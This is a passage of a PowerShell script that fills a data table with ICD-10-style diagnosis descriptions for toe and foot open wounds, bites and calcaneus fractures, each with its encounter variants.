lesser toe(s) without damage to nail","Puncture wound with foreign body of left lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left lesser toe(s) without damage to nail","Puncture wound with foreign body of left lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left lesser toe(s) without damage to nail","Puncture wound with foreign body of left lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified lesser toe(s) without damage to nail","Puncture wound with foreign body of unspecified lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified lesser toe(s) without damage to nail","Puncture wound with foreign body of unspecified lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified lesser toe(s) without damage to nail","Puncture wound with foreign body of unspecified lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified toe(s) without damage to nail","Puncture wound with foreign body of unspecified toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified toe(s) without damage to nail","Puncture wound with foreign body of unspecified toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified toe(s) without damage to nail","Puncture wound with foreign body of unspecified toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right great toe without damage to nail","Open bite of right great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right great toe without damage to nail","Open bite of right great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right great toe without damage to nail","Open bite of right great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left great toe without damage to nail","Open bite of left great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left great toe without damage to nail","Open bite of left great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left great toe without damage to nail","Open bite of left great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified great toe without damage to nail","Open bite of unspecified great toe without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified great toe without damage to nail","Open bite of unspecified great toe without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified great toe without damage to nail","Open bite of unspecified great toe without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right lesser toe(s) without damage to nail","Open bite of right lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right lesser toe(s) without damage to nail","Open bite of right lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right lesser toe(s) without damage to nail","Open bite of right lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left lesser toe(s) without damage to nail","Open bite of left lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left lesser toe(s) without damage to nail","Open bite of left lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left lesser toe(s) without damage to nail","Open bite of left lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified lesser toe(s) without damage to nail","Open bite of unspecified lesser toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified lesser toe(s) without damage to nail","Open bite of unspecified lesser toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified lesser toe(s) without damage to nail","Open bite of unspecified lesser toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified toe(s) without damage to nail","Open bite of unspecified toe(s) without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified toe(s) without damage to nail","Open bite of unspecified toe(s) without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified toe(s) without damage to nail","Open bite of unspecified toe(s) without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right great toe with damage to nail","Unspecified open wound of right great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right great toe with damage to nail","Unspecified open wound of right great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right great toe with damage to nail","Unspecified open wound of right great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left great toe with damage to nail","Unspecified open wound of left great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left great toe with damage to nail","Unspecified open wound of left great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left great toe with damage to nail","Unspecified open wound of left great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified great toe with damage to nail","Unspecified open wound of unspecified great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified great toe with damage to nail","Unspecified open wound of unspecified great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified great toe with damage to nail","Unspecified open wound of unspecified great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right lesser toe(s) with damage to nail","Unspecified open wound of right lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right lesser toe(s) with damage to nail","Unspecified open wound of right lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right lesser toe(s) with damage to nail","Unspecified open wound of right lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left lesser toe(s) with damage to nail","Unspecified open wound of left lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left lesser toe(s) with damage to nail","Unspecified open wound of left lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left lesser toe(s) with damage to nail","Unspecified open wound of left lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified lesser toe(s) with damage to nail","Unspecified open wound of unspecified lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified lesser toe(s) with damage to nail","Unspecified open wound of unspecified lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified lesser toe(s) with damage to nail","Unspecified open wound of unspecified lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified toe(s) with damage to nail","Unspecified open wound of unspecified toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified toe(s) with damage to nail","Unspecified open wound of unspecified toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified toe(s) with damage to nail","Unspecified open wound of unspecified toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right great toe with damage to nail","Laceration without foreign body of right great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right great toe with damage to nail","Laceration without foreign body of right great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right great toe with damage to nail","Laceration without foreign body of right great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left great toe with damage to nail","Laceration without foreign body of left great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left great toe with damage to nail","Laceration without foreign body of left great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left great toe with damage to nail","Laceration without foreign body of left great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified great toe with damage to nail","Laceration without foreign body of unspecified great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified great toe with damage to nail","Laceration without foreign body of unspecified great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified great toe with damage to nail","Laceration without foreign body of unspecified great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right lesser toe(s) with damage to nail","Laceration without foreign body of right lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right lesser toe(s) with damage to nail","Laceration without foreign body of right lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right lesser toe(s) with damage to nail","Laceration without foreign body of right lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left lesser toe(s) with damage to nail","Laceration without foreign body of left lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left lesser toe(s) with damage to nail","Laceration without foreign body of left lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left lesser toe(s) with damage to nail","Laceration without foreign body of left lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified lesser toe(s) with damage to nail","Laceration without foreign body of unspecified lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified lesser toe(s) with damage to nail","Laceration without foreign body of unspecified lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified lesser toe(s) with damage to nail","Laceration without foreign body of unspecified lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified toe(s) with damage to nail","Laceration without foreign body of unspecified toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified toe(s) with damage to nail","Laceration without foreign body of unspecified toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified toe(s) with damage to nail","Laceration without foreign body of unspecified toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right great toe with damage to nail","Laceration with foreign body of right great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right great toe with damage to nail","Laceration with foreign body of right great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right great toe with damage to nail","Laceration with foreign body of right great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left great toe with damage to nail","Laceration with foreign body of left great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left great toe with damage to nail","Laceration with foreign body of left great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left great toe with damage to nail","Laceration with foreign body of left great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified great toe with damage to nail","Laceration with foreign body of unspecified great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified great toe with damage to nail","Laceration with foreign body of unspecified great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified great toe with damage to nail","Laceration with foreign body of unspecified great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right lesser toe(s) with damage to nail","Laceration with foreign body of right lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right lesser toe(s) with damage to nail","Laceration with foreign body of right lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right lesser toe(s) with damage to nail","Laceration with foreign body of right lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left lesser toe(s) with damage to nail","Laceration with foreign body of left lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left lesser toe(s) with damage to nail","Laceration with foreign body of left lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left lesser toe(s) with damage to nail","Laceration with foreign body of left lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified lesser toe(s) with damage to nail","Laceration with foreign body of unspecified lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified lesser toe(s) with damage to nail","Laceration with foreign body of unspecified lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified lesser toe(s) with damage to nail","Laceration with foreign body of unspecified lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified toe(s) with damage to nail","Laceration with foreign body of unspecified toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified toe(s) with damage to nail","Laceration with foreign body of unspecified toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified toe(s) with damage to nail","Laceration with foreign body of unspecified toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right great toe with damage to nail","Puncture wound without foreign body of right great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right great toe with damage to nail","Puncture wound without foreign body of right great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right great toe with damage to nail","Puncture wound without foreign body of right great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left great toe with damage to nail","Puncture wound without foreign body of left great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left great toe with damage to nail","Puncture wound without foreign body of left great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left great toe with damage to nail","Puncture wound without foreign body of left great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified great toe with damage to nail","Puncture wound without foreign body of unspecified great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified great toe with damage to nail","Puncture wound without foreign body of unspecified great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified great toe with damage to nail","Puncture wound without foreign body of unspecified great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right lesser toe(s) with damage to nail","Puncture wound without foreign body of right lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right lesser toe(s) with damage to nail","Puncture wound without foreign body of right lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right lesser toe(s) with damage to nail","Puncture wound without foreign body of right lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left lesser toe(s) with damage to nail","Puncture wound without foreign body of left lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left lesser toe(s) with damage to nail","Puncture wound without foreign body of left lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left lesser toe(s) with damage to nail","Puncture wound without foreign body of left lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified lesser toe(s) with damage to nail","Puncture wound without foreign body of unspecified lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified lesser toe(s) with damage to nail","Puncture wound without foreign body of unspecified lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified lesser toe(s) with damage to nail","Puncture wound without foreign body of unspecified lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified toe(s) with damage to nail","Puncture wound without foreign body of unspecified toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified toe(s) with damage to nail","Puncture wound without foreign body of unspecified toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified toe(s) with damage to nail","Puncture wound without foreign body of unspecified toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right great toe with damage to nail","Puncture wound with foreign body of right great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right great toe with damage to nail","Puncture wound with foreign body of right great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right great toe with damage to nail","Puncture wound with foreign body of right great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left great toe with damage to nail","Puncture wound with foreign body of left great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left great toe with damage to nail","Puncture wound with foreign body of left great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left great toe with damage to nail","Puncture wound with foreign body of left great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified great toe with damage to nail","Puncture wound with foreign body of unspecified great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified great toe with damage to nail","Puncture wound with foreign body of unspecified great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified great toe with damage to nail","Puncture wound with foreign body of unspecified great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right lesser toe(s) with damage to nail","Puncture wound with foreign body of right lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right lesser toe(s) with damage to nail","Puncture wound with foreign body of right lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right lesser toe(s) with damage to nail","Puncture wound with foreign body of right lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left lesser toe(s) with damage to nail","Puncture wound with foreign body of left lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left lesser toe(s) with damage to nail","Puncture wound with foreign body of left lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left lesser toe(s) with damage to nail","Puncture wound with foreign body of left lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified lesser toe(s) with damage to nail","Puncture wound with foreign body of unspecified lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified lesser toe(s) with damage to nail","Puncture wound with foreign body of unspecified lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified lesser toe(s) with damage to nail","Puncture wound with foreign body of unspecified lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified toe(s) with damage to nail","Puncture wound with foreign body of unspecified toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified toe(s) with damage to nail","Puncture wound with foreign body of unspecified toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified toe(s) with damage to nail","Puncture wound with foreign body of unspecified toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right great toe with damage to nail","Open bite of right great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right great toe with damage to nail","Open bite of right great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right great toe with damage to nail","Open bite of right great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left great toe with damage to nail","Open bite of left great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left great toe with damage to nail","Open bite of left great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left great toe with damage to nail","Open bite of left great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified great toe with damage to nail","Open bite of unspecified great toe with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified great toe with damage to nail","Open bite of unspecified great toe with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified great toe with damage to nail","Open bite of unspecified great toe with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right lesser toe(s) with damage to nail","Open bite of right lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right lesser toe(s) with damage to nail","Open bite of right lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right lesser toe(s) with damage to nail","Open bite of right lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left lesser toe(s) with damage to nail","Open bite of left lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left lesser toe(s) with damage to nail","Open bite of left lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left lesser toe(s) with damage to nail","Open bite of left lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified lesser toe(s) with damage to nail","Open bite of unspecified lesser toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified lesser toe(s) with damage to nail","Open bite of unspecified lesser toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified lesser toe(s) with damage to nail","Open bite of unspecified lesser toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified toe(s) with damage to nail","Open bite of unspecified toe(s) with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified toe(s) with damage to nail","Open bite of unspecified toe(s) with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified toe(s) with damage to nail","Open bite of unspecified toe(s) with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right foot","Unspecified open wound, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right foot","Unspecified open wound, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right foot","Unspecified open wound, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left foot","Unspecified open wound, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left foot","Unspecified open wound, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left foot","Unspecified open wound, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified foot","Unspecified open wound, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified foot","Unspecified open wound, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified foot","Unspecified open wound, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right foot","Laceration without foreign body, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right foot","Laceration without foreign body, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right foot","Laceration without foreign body, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left foot","Laceration without foreign body, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left foot","Laceration without foreign body, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left foot","Laceration without foreign body, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified foot","Laceration without foreign body, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified foot","Laceration without foreign body, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified foot","Laceration without foreign body, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right foot","Laceration with foreign body, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right foot","Laceration with foreign body, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right foot","Laceration with foreign body, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left foot","Laceration with foreign body, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left foot","Laceration with foreign body, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left foot","Laceration with foreign body, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified foot","Laceration with foreign body, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified foot","Laceration with foreign body, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified foot","Laceration with foreign body, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right foot","Puncture wound without foreign body, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right foot","Puncture wound without foreign body, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right foot","Puncture wound without foreign body, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left foot","Puncture wound without foreign body, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left foot","Puncture wound without foreign body, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left foot","Puncture wound without foreign body, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified foot","Puncture wound without foreign body, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified foot","Puncture wound without foreign body, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified foot","Puncture wound without foreign body, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right foot","Puncture wound with foreign body, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right foot","Puncture wound with foreign body, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right foot","Puncture wound with foreign body, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left foot","Puncture wound with foreign body, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left foot","Puncture wound with foreign body, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left foot","Puncture wound with foreign body, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified foot","Puncture wound with foreign body, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified foot","Puncture wound with foreign body, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified foot","Puncture wound with foreign body, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, right foot","Open bite, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right foot","Open bite, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right foot","Open bite, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, left foot","Open bite, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left foot","Open bite, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left foot","Open bite, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified foot","Open bite, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified foot","Open bite, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified foot","Open bite, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right calcaneus","Unspecified fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right calcaneus","Unspecified fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right calcaneus","Unspecified fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right calcaneus","Unspecified fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right calcaneus","Unspecified fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right calcaneus","Unspecified fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right calcaneus","Unspecified fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left 